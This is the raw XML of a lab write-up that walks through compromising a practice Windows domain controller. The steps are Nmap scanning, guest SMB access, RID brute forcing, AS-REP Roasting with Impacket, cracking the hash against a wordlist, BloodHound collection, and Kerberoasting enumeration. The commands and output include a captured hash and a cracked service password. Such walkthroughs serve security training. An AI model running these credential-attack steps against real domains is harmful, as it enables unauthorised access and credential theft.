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4nog38wj0era"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qidyu1bagcvw"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WCorp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. The machine presents ASREPRoasting and Impersonation attacks. If you need support, please open a ticket in their </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> 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1"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.yr61p4l2c4p2"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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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begin this project with the reconnaissance phase, performing information gathering about the target environment. We will conduct port enumeration to identify active and exposed services within the target environment.</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bash</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~/tools/enumport/script.sh</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172.16.11.181</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Enumerando</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portas....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Portas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abertas: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53,88,135,139,389,445,593,636,3269,3389,5985,9389,49664,49668,49673,49674,49706,49713,49785</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Verificando</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Serviços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Starting</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Nmap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7.94SVN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https://nmap.org</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2025-04-19</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19:11</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-03</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Nmap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scan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report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for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172.16.11.181</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Host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is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up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(0.14s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latency).</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PORT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STATE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SERVICE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VERSION</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53/tcp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domain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Simple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Plus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88/tcp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kerberos-sec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Kerberos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(server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time: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2025-04-19</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22:11:26Z)</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135/tcp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139/tcp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netbios-ssn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netbios-ssn</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389/tcp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ldap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Active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Directory</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LDAP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(Domain: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wcorp.hc0.,</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Site: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Default-First-Site-Name)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|_ssl-date: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TLS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randomness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does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represent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time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ssl-cert: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19">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Alternative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DNS:dc-01.wcorp.hc</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before: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2025-04-16T06:57:57</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after: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2026-04-16T06:57:57</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445/tcp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microsoft-ds?</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593/tcp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ncacn_http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over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1.0</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636/tcp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ssl/ldap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Active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Directory</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LDAP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(Domain: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wcorp.hc0.,</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Site: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Default-First-Site-Name)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ssl-cert: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20">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Alternative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DNS:dc-01.wcorp.hc</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before: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2025-04-16T06:57:57</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after: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2026-04-16T06:57:57</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|_ssl-date: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TLS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randomness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does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represent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time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3269/tcp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ssl/ldap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Active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Directory</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LDAP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(Domain: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wcorp.hc0.,</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Site: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Default-First-Site-Name)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ssl-cert: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26">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Alternative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DNS:dc-01.wcorp.hc</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before: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2025-04-16T06:57:57</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after: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2026-04-16T06:57:57</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|_ssl-date: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TLS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randomness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does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represent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time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3389/tcp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ms-wbt-server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Terminal</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Services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ssl-cert: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Subject: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commonName=dc-01.wcorp.hc</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before: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2025-04-15T06:30:33</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valid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after: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2025-10-15T06:30:33</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|_ssl-date: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2025-04-19T22:12:55+00:00;</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-18s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from</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scanner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time.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rdp-ntlm-info:</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30">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Target_Name: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NetBIOS_Domain_Name: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NetBIOS_Computer_Name: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DC-01</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DNS_Domain_Name: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wcorp.hc</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DNS_Computer_Name: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dc-01.wcorp.hc</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DNS_Tree_Name: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wcorp.hc</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Product_Version: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10.0.20348</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System_Time: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2025-04-19T22:12:16+00:00</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5985/tcp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HTTPAPI</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(SSDP/UPnP)</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|_http-server-header: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Microsoft-HTTPAPI/2.0</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|_http-title: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Not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Found</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9389/tcp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mc-nmf</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.NET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Message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Framing</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49664/tcp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49668/tcp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49673/tcp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ncacn_http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over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1.0</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49674/tcp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49706/tcp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49713/tcp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49785/tcp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open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msrpc</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Microsoft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RPC</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Service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Info:</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Host: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DC-01;</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Windows;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CPE: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cpe:/o:microsoft:windows</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Host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script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results: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smb2-time:</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47">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2025-04-19T22:12:19</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start_date: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N/A</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smb2-security-mode:</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4A">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3:1:1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Message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signing</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enabled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and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required</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|_clock-skew:</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mean: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-18s,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deviation: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0s,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median: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-18s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Service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detection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performed.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Please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report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any</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incorrect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results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https://nmap.org/submit/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Nmap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done:</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IP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address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host</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up)</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scanned</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in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110.29</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seconds</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51">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: For port and service enumeration, we used the custom script together with Nmap:</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="188038"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/fstringuetta/enumport</w:t>
        </w:r>
      </w:hyperlink>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facilitate name resolution, we added the domain directly to the hosts file.</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/etc/hosts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Considering that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service is active on the target, an attempt was made to access public shares using guest credentials. The objective of this step is to identify potential misconfigurations in shared resources that may be accessible without authentication or with minimal permissions.</w:t>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--shares</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(signing:True)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(SMBv1:False)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wcorp.hc\guest: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shares</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Remark</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IPC</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NETLOGON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SYSVOL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that the guest account is enabled and has read permissions on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shares, allowing directory listing. Although no relevant files or directories were found in this context, these permissions can be leveraged to enumerate domain users through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RID Brute Forcing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter in netexec.</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175000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The execution of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter allowed the enumeration of valid domain users.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.azb9ipyw9jna" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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the collected data, it was possible to compile a list of accounts for use in subsequent authentication and exploitation steps.</w:t>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--rid-brute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2&gt;/dev/null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'SidTypeUser'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Guest</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krbtgt</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john.doe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alice.hr</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bob.finance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charlie.dev</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diana.ops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svc_backup</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svc_web</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Based on the enumerated user list, two possible service accounts were identified: svc_backup</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 and svc_web.</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With this information, the</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 GetNPUsers.py</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script, which </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belongs to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Impacket </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package, was used with the aim of verifying the presence of the 'Do not require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Kerberos </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preauthentication' setting.</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If enabled, this condition allows the extraction of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Kerberos TGT (AS-REP)</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 hashes, enabling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AS-REP Roasting</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 attacks.</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GetNPUsers.py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wcorp.hc/guest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hashes</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Impacket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v0.13.0.dev0+20250320.94448.5a402fcb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Fortra,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Kerberos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KDC_ERR_CLIENT_REVOKED(Clients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revoked)</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john.doe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alice.hr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bob.finance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charlie.dev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diana.ops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$krb5asrep$23$svc_backup@WCORP.HC:d1c7e43b9d22ee883593a84c4c26a64a$9f641890d729f05e7357ea122ec66cd1d2720f366693a878f40bcf483ae058b1304d1bb4a41a43df1a74748563ff78d50f648b13e07b1c0d316791ae046dcac1d411cce3b31....</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UF_DONT_REQUIRE_PREAUTH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08F">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0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of parameters: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wcorp.hc/guest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domain and user used for authentication (in this case, guest)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-no-pass</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indicates that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no password</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will be used for access (anonymous or guest)</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-dc-ip 172.16.11.181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IP address of the target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Domain Controller</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-usersfile users.txt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file containing the list of users to be tested</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outputfile hashes</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saves the obtained Kerberos TGT hashes to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hashes</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file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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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After executing the script, it was possible to retrieve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Kerberos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hash for the user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svc_backup</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A file containing the extracted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hash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was then created, which was used for a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brute-force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attack to identify the cleartext password.</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-w=/usr/share/wordlists/rockyou.txt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--format=krb5asrep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hashes-krb5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(krb5asrep,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Kerberos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17/18/23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HMAC-MD5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RC4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PBKDF2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HMAC-SHA1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256/256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AVX2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8x])</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($krb5asrep$23$svc_backup@WCORP.HC)</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0.07017g/s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764874p/s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764874c/s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764874C/s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Lxi911S..LuvForLav@</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reliably</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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Once the service account hash was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successfully cracked,</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the obtained credential could be validated using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netexec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tool, confirming its use for authentication in the environment.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114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1397000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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397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Having successfully validated the credential, it was possible to enumerate all users registered in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Active Directory</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using the authentication provided by the compromised service account, gaining access to our first evidence.</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'svc_backup'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1536700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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53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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dc0dwac7jtjv" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:after="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continue the attack and obtain access to the final evidence, it will be necessary to compromise the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator account.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> As a first step, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ingestor was executed in order to gain a comprehensive overview of the domain structure and identify potential privilege escalation paths.</w:t>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bloodhound-python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'svc_backup'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LDAP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dc-01.wcorp.hc</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domains</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forest</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computers</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LDAP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dc-01.wcorp.hc</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LDAP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dc-01.wcorp.hc</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groups</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gpos</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ous</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containers</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Querying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dc-01.wcorp.hc</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27S</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20250419205634_bloodhound.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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heading=h.z3teracvpez1" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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w96ywqjb78gj" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of the parameters: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data collection for the domain (users, groups, ACLs, sessions, trust relationships, etc.).</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wcorp.hc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domain name.</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 'svc_backup'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 used for authentication.</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 'LuvinJames&lt;3'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for the account used for authentication.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-dc dc-01.wcorp.hc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FQDN of the Domain Controller to be queried.</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-ns 172.16.11.181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 of the DNS server (usually the DC itself).</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Once the compressed file in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.zip</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format was generated, the content was imported into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BloodHound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application interface for analysis of the domain topology and identification of possible privilege escalation paths.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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2413000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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413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GetUserSPNs.py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wcorp.hc/svc_backup:'PASSWORD_HERE'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Impacket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v0.13.0.dev0+20250320.94448.5a402fcb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Fortra,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ServicePrincipalName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PasswordLastSet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LastLogon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HTTP/app01.wcorp.hc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03:55:21.770126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18:20:46.842080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heading=h.3o336p58jl3r" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1sh6foo6dqct" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of the parameters:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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wcorp.hc/svc\_backup:'LuvinJames\&lt;3'</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authentication credentials, with the domain wcorp.hc, the user svc\_backup and the password 'LuvinJames\&lt;3'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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dc-ip 172.16.11.181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Domain Controller IP (used to avoid DNS resolution or naming issues).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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it was identified that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_web</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account has an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SPN </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">configured. Based on this information, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos TGS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash associated with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
